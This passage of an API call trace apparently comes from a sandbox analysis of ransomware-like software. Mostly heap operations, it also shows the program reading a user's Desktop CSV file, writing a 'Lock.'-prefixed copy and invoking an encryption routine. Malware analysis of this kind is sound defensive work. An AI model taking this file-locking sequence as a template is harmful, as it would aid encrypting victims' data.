returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0133.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0133.439] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0133.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0133.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0133.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0133.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0133.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f26008 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0133.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0133.440] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/5_pKd716n7PnD.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\5_pkd716n7pnd.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0133.441] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.441] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0133.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0133.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0133.442] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0133.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0133.442] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0133.442] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0133.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0133.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0133.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0133.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0133.442] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0133.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0133.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0133.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f36010 [0133.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0133.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0133.443] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.5_pKd716n7PnD.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.5_pkd716n7pnd.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0133.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0133.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0133.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0133.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0133.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0133.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0133.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0133.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0133.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0133.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0133.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3bea020 [0133.483] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0133.483] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0133.486] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x3fbd, lpOverlapped=0x0) returned 1 [0133.487] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0133.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0133.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0133.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0133.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fbd) returned 0x2e80330 [0133.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bea020 | out: hHeap=0x970000) returned 1 [0133.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0133.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0133.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0133.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fbd) returned 0x2e942f8 [0133.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0133.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0133.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0133.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0133.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0133.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fbd) returned 0x2e80330 [0133.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0133.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0133.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0133.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0133.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0133.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0133.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0133.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0133.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0133.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0133.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0133.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0133.638] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0133.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0133.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0133.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0133.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0133.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0133.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fbd) returned 0x2e80330 [0133.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0133.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0133.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0133.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0133.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0133.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0133.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0133.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0133.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0133.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0133.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fbd) returned 0x2ea82c0 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0133.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0133.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 